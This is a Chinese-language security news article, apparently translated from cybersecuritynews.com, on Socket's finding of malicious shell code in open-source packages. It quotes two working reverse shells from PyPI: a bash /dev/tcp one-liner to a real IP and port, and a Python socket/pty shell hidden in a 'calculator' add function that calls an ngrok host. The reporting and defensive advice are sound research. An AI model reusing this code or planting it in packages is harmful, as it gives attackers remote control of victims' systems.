威胁行为体利用Shell技术实现持久化驻留并窃取数据

Shell 为作系统提供了关键的命令行界面。虽然 shell 对于系统管理任务来说是合法的，但当被威胁行为者武器化时，它就会转变为跨组织网络进行未经授权的访问、系统控制和数据盗窃的危险途径。

这些工具的滥用变得越来越复杂，恶意行为者将 shell 技术嵌入到看似无害的开源包中。

最近的调查揭示了一个令人担忧的趋势，即老练的威胁行为者在 npm、PyPI、Go 和 Maven 生态系统中部署 shell 技术。

这些 shell 使攻击者能够执行命令、浏览文件系统和将敏感数据传输到网络之外，通常会长时间运行而不被发现，同时保持对受损基础设施的持续访问。

这些技术的多功能性使它们在软件供应链攻击中特别危险。

据报道，包括俄罗斯的 APT28、越南的 APT32 和中国的 HAFNIUM 在内的著名国家资助组织使用 Web Shell 对受感染的系统进行持久访问。

HAFNIUM 特别针对多个行业领域的美国实体，通过受感染的服务器和 Web 应用程序泄露有价值的商业机密，凸显了民族国家层面对这些攻击方法的兴趣。

Socket 研究人员发现了隐藏在看似合法的开源包中的多个恶意 shell 代码实例。

通过大规模扫描和实时分析，Socket 的威胁研究团队揭示了攻击者如何混淆恶意负载以逃避检测，同时建立对受害者系统的持久访问通道。

他们的研究结果表明，这些威胁的演变和隐藏技术的日益复杂。

其影响不仅限于直接的数据盗窃，因为受感染的系统充当持续的后门，随着时间的推移实现横向移动和权限提升，如果不被发现，可能会导致灾难性的数据泄露。

组织在不知情的情况下整合了易受攻击或恶意的依赖项，其数据完整性和运营安全性面临重大风险。

PyPI Shell 技术

PyPI 生态系统中最令人担忧的发现涉及经典的反向 shell 实现，这些实现为攻击者提供了完整的系统控制。

一个示例显示了创建交互式 bash shell 的代码，该 shell 将所有输入/输出重定向到远程连接：-

import osos.system("bash -c 'bash -i >& /dev/tcp/103.252.137.168/7777 0>&1'")

这个看似简单的代码导入 os 模块并执行 bash 命令，在端口 7777 上创建与越南 IP 地址的 TCP 连接，从而为攻击者提供对受感染系统的完全 shell 访问权限。

使用非标准端口 7777（通常为开发人员应用程序开放）使得这种攻击在逃避检测方面特别有效。

一个更复杂的示例伪装成 calculator 函数，同时通过 ngrok 隧道建立反向 shell：-

import socket,subprocess,osclass calculator:    def add(x, y):        s=socket. Socket(socket.AF_INET, socket.SOCK_STREAM)        s.connect(("2.tcp.ngrok.io",14048))        os.dup2(s.fileno(),0)        os.dup2(s.fileno(),1)        os.dup2(s.fileno(), 2)        import pty        pty.spawn("sh")        return x + y

这种欺骗性代码返回输入的总和，同时创建一个支持高级功能（包括文本编辑器和命令历史记录）的伪终端，这使得传统安全工具的检测极具挑战性。

使用 ngrok 作为隧道服务使连接更难被阻止，而 PTY 模块创建了一个“伪终端”，支持复杂的终端作。

套接字专家建议通过整合供应链安全工具、为第三方依赖项实施强有力的策略以及进行定期审查来加强防御，以最大限度地降低这些日益复杂的基于 shell 的攻击风险。

原文来自: cybersecuritynews.com